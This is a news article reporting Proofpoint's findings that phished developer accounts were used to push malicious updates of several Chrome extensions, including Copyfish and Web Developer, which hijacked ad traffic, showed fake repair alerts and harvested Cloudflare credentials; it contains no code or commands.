The number of compromised Chrome browser extensions is growing beyond the initial Aug. 1 hijacking of the OCR add-on called Copyfish. Added to list are seven additional legitimate Chrome Extensions that attackers took over and used to manipulate internet traffic and web-based ads, according to researchers at Proofpoint.
A report released Monday shows an expanded list of compromised Chrome Extensions to include: Web Developer (0.4.9), Chrometana (1.1.3), Infinity New Tab (3.12.3), Web Paint (1.2.1), and Social Fixer (20.1.1). It also believes extensions TouchVPN and Betternet VPN were also compromised in the same way at the end of June.
The rash of browser extension takeovers is similar to a July 28 compromise of developer credentials belonging to distributor A9t9 Software. In that incident the popular free optical character recognition extension for web browsers called Copyfish was hijacked by attackers who used it to send spam.
“At the end of July and beginning of August, several Chrome Extensions were compromised after their author’s Google Account credentials were stolen via a phishing scheme,” Proofpoint said. Researchers did not identify the developer or developers that may have been involved.
The July attack against A9t9 Software stemmed from a phishing email targeting a developer behind the Copyfish extension. The recipient thought the email was Google warning they needed to update the Copyfish app or face it being booted from the Google Play marketplace.
Next, an unsuspecting A9t9 Software “team member” clicked on a link and up popped a “Google” password dialog box. “The unlucky team member entered the password for our developer account,” according to a statement by the company A9t9 Software earlier this month.
This allowed attackers to customize the Copyfish extension via code injection and distribute malicious versions of the software. Since A9t9 Software reported the hijacking, it said it has worked with Google to win back control of the developer account and remove malicious elements of the Copyfish Chrome Extension.
In similar phishing attacks, Proofpoint said hackers tricked extension coders to hand over Google Account credentials. Those credentials were then used to access Google developer accounts tied to specific Chrome extensions. As with Copyfish, extensions were modified with malicious code and Google developer accounts compromised.
“This resulted in hijacking of traffic and exposing users to potentially malicious popups and credential theft,” wrote Proofpoint on Monday.
In one example of malicious behavior, the compromised version of an extension attempts to substitute ads on the victim’s browser, hijack traffic from legitimate advertising networks and trick victims into “repairing” their computer. Proofpoint said that attackers singled out adult websites when substituting ads and focused on a particular unnamed ad network.
“In many cases, victims were presented with fake JavaScript alerts prompting them to ‘repair’ their PC then redirecting them to affiliate programs from which the threat actors could profit,” Proofpoint said. “(The) malvertising chain that brings users from the fake alert to an affiliate site; we observed the compromised extension directing victims to two such affiliates, although others may also have been used.”
An analysis of of the affiliate landing pages (browser-update[.]info, browser-update[.]info and searchtab[.]win) showed that traffic was “substantial.” According to Proofpoint, searchtab[.]win received 920,000 visits in one month. It’s unclear how much of that traffic was generated via the hijacked Chrome Extensions.
Researchers said that they were alerted to the additional extension takeovers by developer Chris Pederick, who on Aug. 12, tweeted that the Web Developer extension for Chrome had been compromised and that a hacked version of the extension (0.4.9) was uploaded and being distributed.
In Pederick’s case, Proofpoint was able to retrieve the compromised version of the extension and isolate the injected code. An analysis of the code showed that attackers were retrieving a remote file, ga.js, over HTTPS from a server whose domain is generated via a domain generation algorithm, Proofpoint said.
“The code from this first step allows the threat actors to conditionally call additional scripts including some to harvest Cloudflare credentials,” they wrote. Credentials were used to bypass Cloudflare protections, enabling hackers to substitute advertisements on websites, Proofpoint said.
“In addition to hijacking traffic and driving users to questionable affiliate programs, we have also observed them gathering and exfiltrating Cloudflare credentials, providing the actors with new means of potential future attacks,” researchers said.